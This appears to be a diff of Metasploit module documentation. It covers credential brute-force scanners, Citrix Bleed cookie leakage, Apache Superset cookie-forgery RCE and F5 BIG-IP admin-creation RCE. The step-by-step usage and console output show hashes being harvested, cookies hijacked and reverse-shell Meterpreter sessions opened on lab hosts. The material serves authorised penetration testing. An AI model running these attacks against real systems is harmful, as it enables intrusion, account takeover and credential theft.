|
||||
|
||||
|
||||
### DB_ALL_USERS
|
||||
|
||||
Add all users in the current database to the list
|
||||
|
||||
### DB_SKIP_EXISTING
|
||||
|
||||
Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
|
||||
|
||||
|
||||
### PASSWORD
|
||||
|
||||
A specific password to authenticate with
|
||||
|
||||
### PASS_FILE
|
||||
|
||||
File containing passwords, one per line
|
||||
|
||||
### STOP_ON_SUCCESS
|
||||
|
||||
Stop guessing when a credential works for a host
|
||||
|
||||
### THREADS
|
||||
|
||||
The number of concurrent threads (max one per host)
|
||||
|
||||
### USERPASS_FILE
|
||||
|
||||
File containing users and passwords separated by space, one pair per line
|
||||
|
||||
### USER_FILE
|
||||
|
||||
File containing usernames, one per line
|
||||
|
||||
### VERBOSE
|
||||
|
||||
Whether to print output for all attempts
|
||||
|
||||
### VHOST
|
||||
|
||||
HTTP server virtual host
|
||||
|
||||
## Scenarios
|
||||
Specific demo of using the module that might be useful in a real world scenario.
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/http/axis_login
|
||||
msf6 auxiliary(scanner/http/axis_login) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf6 auxiliary(scanner/http/axis_login) > set password N0tpassword!
|
||||
password => N0tpassword!
|
||||
msf6 auxiliary(scanner/http/axis_login) > set userfile ./USERNAMES
|
||||
userfile => ./USERNAMES
|
||||
msf6 auxiliary(scanner/http/axis_login) > show options
|
||||
|
||||
Module options (auxiliary/scanner/http/axis_login):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
BLANK_PASSWORDS false no Try blank passwords for all users
|
||||
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
|
||||
DB_ALL_CREDS false no Try each user/password couple stored in the current database
|
||||
DB_ALL_PASS false no Add all passwords in the current database to the list
|
||||
DB_ALL_USERS false no Add all users in the current database to the list
|
||||
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
|
||||
PASSWORD no A specific password to authenticate with
|
||||
PASS_FILE no File containing passwords, one per line
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 8080 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
|
||||
TARGETURI /axis2/axis2-admin/login no Path to the Apache Axis Administration page
|
||||
THREADS 1 yes The number of concurrent threads (max one per host)
|
||||
USERNAME no A specific username to authenticate as
|
||||
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
|
||||
USER_AS_PASS false no Try the username as the password for all users
|
||||
USER_FILE no File containing usernames, one per line
|
||||
VERBOSE true yes Whether to print output for all attempts
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 auxiliary(scanner/http/axis_login) > run
|
||||
|
||||
[*] Attempting to login to /stop using password list
|
||||
[!] 127.0.0.1:8080 - No active DB -- Credential data will not be saved!
|
||||
[-] 127.0.0.1:8080 - Failed: 'AxisRoot:password'
|
||||
[+] 127.0.0.1:8080 - 127.0.0.1:8080 - Login Successful: WORKSTATION\AxisRoot:N0tpassword!
|
||||
[*] Auxiliary module execution completed
|
||||
msf6 auxiliary(scanner/http/axis_login) >
|
||||
```
|
||||
@@ -0,0 +1,50 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module scans for a vulnerability that allows a remote, unauthenticated attacker to leak memory for a target Citrix
|
||||
ADC server. The leaked memory is then scanned for session cookies which can be hijacked if found.
|
||||
|
||||
## Verification Steps
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: `use auxiliary/scanner/http/citrix_bleed_cve_2023_4966`
|
||||
4. Do: `set RHOSTS`
|
||||
5. Do: `run`
|
||||
|
||||
## Options
|
||||
|
||||
## Scenarios
|
||||
Specific demo of using the module that might be useful in a real world scenario.
|
||||
|
||||
### Citrix ADC 13.1-48.47
|
||||
|
||||
NetScaler VPX instance for VMware ESX from `NSVPX-ESX-13.1-48.47_nc_64`.
|
||||
|
||||
```
|
||||
msf6 auxiliary(scanner/http/citrix_bleed_cve_2023_4966) > show options
|
||||
|
||||
Module options (auxiliary/scanner/http/citrix_bleed_cve_2023_4966):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.159.150 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI / yes Base path
|
||||
THREADS 20 yes The number of concurrent threads (max one per host)
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 auxiliary(scanner/http/citrix_bleed_cve_2023_4966) > run
|
||||
|
||||
[+] Cookie: NSC_AAAC=fdac8de9ed76012688b4d33e9d5f74b00c3a0818745525d5f4f58455e445a4a42 Username: metasploit
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf6 auxiliary(scanner/http/citrix_bleed_cve_2023_4966) >
|
||||
```
|
||||
|
||||
Once the cookie has been leaked, load it into the browser using the developer tools.
|
||||
@@ -3,7 +3,9 @@
|
||||
The `auxiliary/scanner/kerberos/kerberos_login` module can verify Kerberos credentials against a range of machines and
|
||||
report successful logins. If you have loaded a database plugin
|
||||
and connected to a database this module will record successful
|
||||
logins and hosts so you can track your access.
|
||||
logins and hosts so you can track your access. It will also
|
||||
store kerberos tickets that can be used even after the user's
|
||||
password has been changed.
|
||||
|
||||
Kerberos accounts which do not require pre-authentication will
|
||||
have the TGT logged for offline cracking, this technique is known as AS-REP Roasting.
|
||||
|
||||
@@ -0,0 +1,71 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).
|
||||
|
||||
### Setup
|
||||
A docker container can be spun up with the following command to test this module:
|
||||
`docker run -e 'ACCEPT_EULA=Y' -e 'MSSQL_SA_PASSWORD=N0tpassword!' -p 1433:1433 -d mcr.microsoft.com/mssql/server:2022-latest`
|
||||
|
||||
## Verification Steps
|
||||
1. Start msfconsole
|
||||
2. Do: `use scanner/mssql/mssql_login`
|
||||
3. Do: `set RHOSTS [IP]`
|
||||
4. Do: `run`
|
||||
5. You should get a shell.
|
||||
|
||||
## Options
|
||||
|
||||
### USER_FILE
|
||||
|
||||
File containing users, one per line.
|
||||
|
||||
### PASS_FILE
|
||||
|
||||
File containing passwords, one per line
|
||||
|
||||
## Scenarios
|
||||
```
|
||||
msf > use scanner/mssql/mssql_login
|
||||
msf6 auxiliary(scanner/mssql/mssql_login) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf6 auxiliary(scanner/mssql/mssql_login) > set password N0tpassword!
|
||||
password => N0tpassword!
|
||||
msf6 auxiliary(scanner/mssql/mssql_login) > options
|
||||
|
||||
Module options (auxiliary/scanner/mssql/mssql_login):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
|
||||
BLANK_PASSWORDS true no Try blank passwords for all users
|
||||
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
|
||||
DB_ALL_CREDS false no Try each user/password couple stored in the current database
|
||||
DB_ALL_PASS false no Add all passwords in the current database to the list
|
||||
DB_ALL_USERS false no Add all users in the current database to the list
|
||||
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
|
||||
PASSWORD N0tpassword! no A specific password to authenticate with
|
||||
PASS_FILE no File containing passwords, one per line
|
||||
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 1433 yes The target port (TCP)
|
||||
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
|
||||
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
|
||||
THREADS 1 yes The number of concurrent threads (max one per host)
|
||||
USERNAME sa no A specific username to authenticate as
|
||||
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
|
||||
USER_AS_PASS false no Try the username as the password for all users
|
||||
USER_FILE no File containing usernames, one per line
|
||||
USE_WINDOWS_AUTHENT false yes Use windows authentication (requires DOMAIN option set)
|
||||
VERBOSE true yes Whether to print output for all attempts
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 auxiliary(scanner/mssql/mssql_login) > run
|
||||
|
||||
[*] 127.0.0.1:1433 - 127.0.0.1:1433 - MSSQL - Starting authentication scanner.
|
||||
[!] 127.0.0.1:1433 - No active DB -- Credential data will not be saved!
|
||||
[+] 127.0.0.1:1433 - 127.0.0.1:1433 - Login Successful: WORKSTATION\sa:N0tpassword!
|
||||
[*] 127.0.0.1:1433 - Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf6 auxiliary(scanner/mssql/mssql_login) >
|
||||
```
|
||||
@@ -0,0 +1,92 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module will attempt to authenticate to a Nessus server's RPC interface.
|
||||
|
||||
## Verification Steps
|
||||
1. Start msfconsole
|
||||
2. Do: `use auxiliary/scanner/nessus/nessus_rest_login`
|
||||
3. Do: set usernames and passwords via the `username` and `password` options, or pass a list via `user_file` and `pass_file` options
|
||||
4. Do: `run`
|
||||
5. Hopefully you see somthing like this:
|
||||
```
|
||||
[+] 127.0.0.1:8834 - Successful: nessus:4x15pa$$w0rd
|
||||
```
|
||||
|
||||
### Installation Steps
|
||||
This is a summary of installation steps for downloading, installing and running Nessus on Debian. They are as follows:
|
||||
|
||||
1. Go to tenable.com.
|
||||
2. Download the latest version of nessus. Take note of the version number.
|
||||
3. Run the following command in the same directory as the .deb file: `dpkg -i Nessus-<version number>-debian6_amd64.deb`
|
||||
4. Restart nessus with the `systemctl start nessusd` command.
|
||||
5. Use your browser to access port 8834 on localhost (https://localhost:8834).
|
||||
|
||||
## Options
|
||||
### BLANK_PASSWORDS
|
||||
Try blank passwords for all users
|
||||
|
||||
### BRUTEFORCE_SPEED
|
||||
How fast to bruteforce, from 0 to 5
|
||||
|
||||
### DB_ALL_CREDS
|
||||
Try each user/password couple stored in the current database
|
||||
|
||||
### DB_ALL_PASS
|
||||
Add all passwords in the current database to the list
|
||||
|
||||
### DB_ALL_USERS
|
||||
Add all users in the current database to the list
|
||||
|
||||
### DB_SKIP_EXISTING
|
||||
Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
|
||||
|
||||
### PASSWORD
|
||||
A specific password to authenticate with
|
||||
|
||||
### PASS_FILE
|
||||
File containing passwords, one per line
|
||||
|
||||
### STOP_ON_SUCCESS
|
||||
Stop guessing when a credential works for a host
|
||||
|
||||
### TARGETURI
|
||||
The path to the Nessus server login API
|
||||
|
||||
### THREADS
|
||||
The number of concurrent threads (max one per host)
|
||||
|
||||
### USERNAME
|
||||
A specific username to authenticate as
|
||||
|
||||
### USERPASS_FILE
|
||||
File containing users and passwords separated by space, one pair per line
|
||||
|
||||
### USER_AS_PASS
|
||||
Try the username as the password for all users
|
||||
|
||||
### USER_FILE
|
||||
File containing usernames, one per line
|
||||
|
||||
### VERBOSE
|
||||
Whether to print output for all attempts
|
||||
|
||||
### VHOST
|
||||
HTTP server virtual host
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf > use scanner/nessus/nessus_rest_login
|
||||
msf6 auxiliary(scanner/nessus/nessus_rest_login) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf6 auxiliary(scanner/nessus/nessus_rest_login) > set password N0tpassword!
|
||||
password => N0tpassword!
|
||||
msf6 auxiliary(scanner/nessus/nessus_rest_login) > set username notuser
|
||||
username => notuser
|
||||
msf6 auxiliary(scanner/nessus/nessus_rest_login) > run
|
||||
|
||||
[*] Attempting to login to /stop using password list
|
||||
[+] 127.0.0.1:8834 - Success: 'notuser:N0tpassword'!
|
||||
[*] Auxiliary module execution completed
|
||||
msf6 auxiliary(scanner/nessus/nessus_rest_login) >
|
||||
```
|
||||
@@ -0,0 +1,93 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module can determine what public keys are configured for key-based authentication across a range of machines,
|
||||
users, and sets of known keys. The SSH protocol indicates whether a particular key is accepted prior to the client
|
||||
performing the actual signed authentication request. To use this module, a text file containing one or more SSH keys
|
||||
should be provided. These can be private or public, so long as no passphrase is set on the private keys.
|
||||
|
||||
If you have loaded a database plugin and connected to a database, this module will record authorized public keys and
|
||||
hosts so you can track your process. Key files may be a single public (unencrypted) key, or several public keys
|
||||
concatenated together as an ASCII text file. Non-key data should be silently ignored. Private keys will only utilize
|
||||
the public key component stored within the key file.
|
||||
|
||||
### Setup
|
||||
|
||||
This module has been tested against Metasploitable2. Installation and setup instructions and additional
|
||||
information can be found in the Rapid7 documentation here: https://docs.rapid7.com/metasploit/metasploitable-2/
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Have Metasploitable2 running
|
||||
1. Copy the `msfadmin`'s public key from `/home/msfadmin/.ssh/id_rsa.pub` to your machine
|
||||
1. Start `msfconsole -q`
|
||||
1. Do: `use auxiliary/scanner/ssh/ssh_identify_pubkeys`
|
||||
1. Do: `set rhosts`
|
||||
1. Do: `set username root`
|
||||
1. Do: `set key_path` to the copied `id_rsa.pub` file
|
||||
1. Do: `run`
|
||||
|
||||
## Options
|
||||
|
||||
### KEY_FILE
|
||||
|
||||
Filename of one or several cleartext public keys.
|
||||
|
||||
### SSH_DEBUG
|
||||
|
||||
When enabled, outputs verbose SSH debug messages.
|
||||
|
||||
### SSH_BYPASS
|
||||
|
||||
When enabled, verify that authentication was not bypassed when keys are found.
|
||||
|
||||
### SSH_KEYFILE_B64
|
||||
|
||||
Raw data of an unencrypted SSH public key. This should be used by programmatic interfaces to this module only.
|
||||
|
||||
### KEY_DIR
|
||||
|
||||
Directory of several keys. Filenames must not begin with a dot in order to be read.
|
||||
|
||||
### SSH_TIMEOUT
|
||||
|
||||
The maximum time to negotiate a SSH session.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Metasploitable22
|
||||
|
||||
```shell
|
||||
msf6 auxiliary(scanner/ssh/ssh_identify_pubkeys) > cat id_rsa.pub
|
||||
[*] exec: cat id_rsa.pub
|
||||
|
||||
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
|
||||
|
||||
msf6 auxiliary(scanner/ssh/ssh_identify_pubkeys) > options
|
||||
|
||||
Module options (auxiliary/scanner/ssh/ssh_identify_pubkeys):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
|
||||
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
|
||||
DB_ALL_USERS false no Add all users in the current database to the list
|
||||
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
|
||||
KEY_FILE id_rsa.pub yes Filename of one or several cleartext public keys.
|
||||
RHOSTS 192.168.112.178 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 22 yes The target port
|
||||
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
|
||||
THREADS 1 yes The number of concurrent threads (max one per host)
|
||||
USERNAME root no A specific username to authenticate as
|
||||
USER_FILE no File containing usernames, one per line
|
||||
VERBOSE true yes Whether to print output for all attempts
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 auxiliary(scanner/ssh/ssh_identify_pubkeys) > run
|
||||
|
||||
[*] 192.168.112.178:22 SSH - Trying 1 cleartext key per user.
|
||||
[+] 192.168.112.178:22 - [1/1] - Public key accepted: 'root' with key '57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a' (Private Key: No) - msfadmin@metasploitable
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
@@ -0,0 +1,141 @@
|
||||
## Vulnerable Application
|
||||
|
||||
Apache Superset versions <= 2.0.0 utilize Flask with a known default secret key which is used to sign HTTP cookies.
|
||||
These cookies can therefore be forged. If a user is able to login to the site, they can decode the cookie, set their user_id to that
|
||||
of an administrator, and re-sign the cookie. This valid cookie can then be used to login as the targeted user. From there the
|
||||
Superset database is mounted, and credentials are pulled. A dashboard is then created. Lastly a pickled python payload can be
|
||||
set for that dashboard within Superset's database which will trigger the RCE.
|
||||
|
||||
An attempt to clean up ALL of the dashboard key values and reset them to their previous values happens during the cleanup phase.
|
||||
|
||||
### App Install
|
||||
|
||||
```
|
||||
sudo docker run -p 8088:8088 --name superset apache/superset:2.0.0
|
||||
sudo docker exec -it superset superset fab create-admin \
|
||||
--username admin \
|
||||
--firstname Superset \
|
||||
--lastname Admin \
|
||||
--email admin@superset.com \
|
||||
--password admin
|
||||
sudo docker exec -it superset superset db upgrade
|
||||
sudo docker exec -it superset superset init
|
||||
```
|
||||
|
||||
Login to the app, click 'list users' under 'Settings', then click '+'. Make a new user with 'Public' as the role.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
1. Start msfconsole
|
||||
1. Do: `use exploit/linux/http/apache_superset_cookie_sig_rce`
|
||||
1. Do: `set rhost [ip]`
|
||||
1. Do: `set username [username]`
|
||||
1. Do: `set password [password]`
|
||||
1. Do: `run`
|
||||
1. You should get a shell.
|
||||
|
||||
## Options
|
||||
|
||||
### USERNAME
|
||||
|
||||
The username to authenticate as. Required with no default.
|
||||
|
||||
### PASSWORD
|
||||
|
||||
The password for the specified username. Required with no default.
|
||||
|
||||
### ADMIN_ID
|
||||
|
||||
The ID of an admin account. Defaults to `1`
|
||||
|
||||
### SECRET_KEYS_FILE
|
||||
|
||||
A file containing secret keys to try. One per line. Defaults to `metasploit-framework/data/wordlists/superset_secret_keys.txt`
|
||||
|
||||
### DATABASE
|
||||
|
||||
Location on the target of the Superset database. Defaults to the Docker location `/app/superset_home/superset.db`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Apache Superset 2.0.0 on Docker
|
||||
|
||||
```
|
||||
resource (superset_rce.rb)> use exploit/linux/http/apache_superset_cookie_sig_rce
|
||||
[*] Using configured payload python/meterpreter/reverse_tcp
|
||||
resource (superset_rce.rb)> set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
resource (superset_rce.rb)> set verbose true
|
||||
verbose => true
|
||||
resource (superset_rce.rb)> set lhost 2.2.2.2
|
||||
lhost => 2.2.2.2
|
||||
resource (superset_rce.rb)> set username user
|
||||
username => user
|
||||
resource (superset_rce.rb)> set password user
|
||||
password => user
|
||||
resource (superset_rce.rb)> set proxies HTTP:127.0.0.1:8080
|
||||
proxies => HTTP:127.0.0.1:8080
|
||||
resource (superset_rce.rb)> set ReverseAllowProxy true
|
||||
ReverseAllowProxy => true
|
||||
resource (superset_rce.rb)> rexploit
|
||||
[*] Reloading module...
|
||||
[*] Started reverse TCP handler on 2.2.2.2:4444
|
||||
[*] Attempting login
|
||||
[*] Grabbing CSRF token
|
||||
[*] 127.0.0.1:8088 - CSRF Token: IjZmOTM2NTI4MmRmYjQyNDdkMGVmMmUxOGVjZDBhOWNmZTZiYWFmZGEi.ZQSodw.C7YXKC5pMw0rGvnJcqVT5ZFkXYQ
|
||||
[*] 127.0.0.1:8088 - Attempting login
|
||||
[+] 127.0.0.1:8088 - Logged in Cookie: session=.eJwNjUEKgzAQRa8SZh2KTa1Vb-Cu-yIyJjMxdIiQhJYi3r1ZPfjw_jtgYcG8UYbxdYAqFfDFFEP0oGGKH5TglOw-xIt6CmEmVdJPoce6wHzOul4kyhuMjJJJg82Jl7K_KcIIHQ-37m5643htTftwDbGha0_WNThYpm5FZIc1JrtFoepU8fwDUO8x4g.ZQSodw.VE5Y8HQDKavvXpMdUVnZrfqiokI;
|
||||
[*] 127.0.0.1:8088 - Checking secret key: \x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h
|
||||
[-] 127.0.0.1:8088 - Incorrect secret key: \x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h
|
||||
[*] 127.0.0.1:8088 - Checking secret key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
|
||||
[+] 127.0.0.1:8088 - Found secret key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
|
||||
[*] 127.0.0.1:8088 - Modified cookie: {"_flashes"=>[{" t"=>["warning", "Invalid login. Please try again."]}], "_fresh"=>false, "csrf_token"=>"6f9365282dfb4247d0ef2e18ecd0a9cfe6baafda", "locale"=>"en", "user_id"=>1}
|
||||
[*] 127.0.0.1:8088 - Attempting to resign with key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
|
||||
[*] 127.0.0.1:8088 - New signed cookie: eyJfZmxhc2hlcyI6W3siIHQiOlsid2FybmluZyIsIkludmFsaWQgbG9naW4uIFBsZWFzZSB0cnkgYWdhaW4uIl19XSwiX2ZyZXNoIjpmYWxzZSwiY3NyZl90b2tlbiI6IjZmOTM2NTI4MmRmYjQyNDdkMGVmMmUxOGVjZDBhOWNmZTZiYWFmZGEiLCJsb2NhbGUiOiJlbiIsInVzZXJfaWQiOjF9.ZQSodw.tqvbZGeoJr4hx6k8CVM_XA-_AAE
|
||||
[+] 127.0.0.1:8088 - Cookie validated to user: admin
|
||||
[*] Attempting to pull user creds from db
|
||||
[+] Successfully created db mapping with id: 2
|
||||
[*] Creating new sqllab tab
|
||||
[+] Using tab: 2
|
||||
[*] Setting latest query id
|
||||
[*] Harvesting superset user creds
|
||||
[+] Superset Creds
|
||||
==============
|
||||
|
||||
Username Password
|
||||
-------- --------
|
||||
admin $pbkdf2-sha256$260000$R203aXBtQVh3ZUlFVmREdQ$/Sivpafs38x.LXzDbxhSsvjfZC5pKpuPONqzOWnsgrk
|
||||
|
||||
[*] Attempting RCE
|
||||
[*] Creating new dashboard
|
||||
[+] New Dashboard id: 2
|
||||
[*] Grabbing permalink to new dashboard to trigger payload later
|
||||
[+] Dashboard permalink key: aojEJOPXQyB
|
||||
[*] Grabbing values to reset later
|
||||
[*] Setting latest query id
|
||||
[*] Setting latest query id
|
||||
[*] Uploading payload
|
||||
[*] Triggering payload
|
||||
[*] Sending stage (24772 bytes) to 1.1.1.1
|
||||
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:57716) at 2023-09-15 14:54:49 -0400
|
||||
[*] Unsetting RCE Payloads
|
||||
[*] Restoring row ID 1
|
||||
[*] Setting latest query id
|
||||
[+] Successfully restored
|
||||
[*] Restoring row ID 3
|
||||
[*] Setting latest query id
|
||||
[+] Successfully restored
|
||||
[*] Deleting dashboard
|
||||
[*] Deleting sqllab tab
|
||||
[*] Deleting database mapping
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: superset
|
||||
meterpreter > sysinfo
|
||||
Computer : 2f7ff4a15c36
|
||||
OS : Linux 6.4.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.4.11-1kali1 (2023-08-21)
|
||||
Architecture : x64
|
||||
System Language : C
|
||||
Meterpreter : python/linux
|
||||
```
|
||||
+6
-6
@@ -52,11 +52,11 @@ Defaults to `/tmp`.
|
||||
### F5 BIG-IP 14.1.2 in VMware Fusion
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/f5_bigip_tmui_rce
|
||||
msf5 > use exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902
|
||||
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
|
||||
msf5 exploit(linux/http/f5_bigip_tmui_rce) > options
|
||||
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > options
|
||||
|
||||
Module options (exploit/linux/http/f5_bigip_tmui_rce):
|
||||
Module options (exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
@@ -87,11 +87,11 @@ Exploit target:
|
||||
1 Linux Dropper
|
||||
|
||||
|
||||
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set rhosts 172.16.249.179
|
||||
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set rhosts 172.16.249.179
|
||||
rhosts => 172.16.249.179
|
||||
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set lhost 172.16.249.1
|
||||
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set lhost 172.16.249.1
|
||||
lhost => 172.16.249.1
|
||||
msf5 exploit(linux/http/f5_bigip_tmui_rce) > run
|
||||
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.249.1:4444
|
||||
[*] Executing automatic check (disable AutoCheck to override)
|
||||
@@ -0,0 +1,77 @@
|
||||
## Vulnerable Application
|
||||
|
||||
### Description
|
||||
|
||||
This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external,
|
||||
unauthenticated attacker to create an administrative user. Once the user is created, the module uses the new account to
|
||||
execute a command payload. Both the exploit and check methods automatically delete any temporary accounts that are
|
||||
created.
|
||||
|
||||
Tested against the VMware OVA release of 16.1.2.1-0.0.10 and 17.0.0.1-0.0.4.
|
||||
|
||||
### Setup
|
||||
|
||||
Download BIGIP-17.0.0.1-0.0.4.ALL-vmware.ova and import it into your desired virtualization software.
|
||||
|
||||
The target does not need to be licensed to be vulnerable.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747`
|
||||
4. Set the `RHOST`, `PAYLOAD` and payload-related options
|
||||
5. Do: `run`
|
||||
6. You should get a shell.
|
||||
|
||||
## Targets
|
||||
|
||||
### Command
|
||||
|
||||
This executes an OS command on the target device.
|
||||
|
||||
## Options
|
||||
|
||||
## Scenarios
|
||||
|
||||
### F5 BIG-IP 17.0.0.1-0.0.4
|
||||
|
||||
```
|
||||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set RHOSTS 192.168.159.32
|
||||
RHOSTS => 192.168.159.32
|
||||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
|
||||
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set LHOST 192.168.159.128
|
||||
LHOST => 192.168.159.128
|
||||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > check
|
||||
[+] 192.168.159.32:443 - The target is vulnerable.
|
||||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.159.128:4444
|
||||
[+] Admin user was created successfully. Credentials: UyPzjB - qu0k7MxIzIDlvS
|
||||
[+] Retrieved the admin hash: $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5tLI9KSSr8M10
|
||||
[*] Obtained login token: 4TAZKYHLZCHPQX3FC47VWNSEUA
|
||||
[*] Sending stage (24768 bytes) to 192.168.159.32
|
||||
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.32:35438) at 2023-11-01 16:36:04 -0400
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
meterpreter > sysinfo
|
||||
Computer : f5test2.home.lan
|
||||
OS : Linux 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Thu Jul 14 23:41:24 PDT 2022
|
||||
Architecture : x64
|
||||
Meterpreter : python/linux
|
||||
meterpreter > pwd
|
||||
/var/service/restjavad
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type JtR Format cracked_password
|
||||
---- ------ ------- ------ ------- ----- ------------ ---------- ----------------
|
||||
192.168.159.32 192.168.159.32 443/tcp (F5 BIG-IP TMUI) admin $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5t (TRUNCATED) Nonreplayable hash sha512,crypt
|
||||
|
||||
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) >
|
||||
```
|
||||
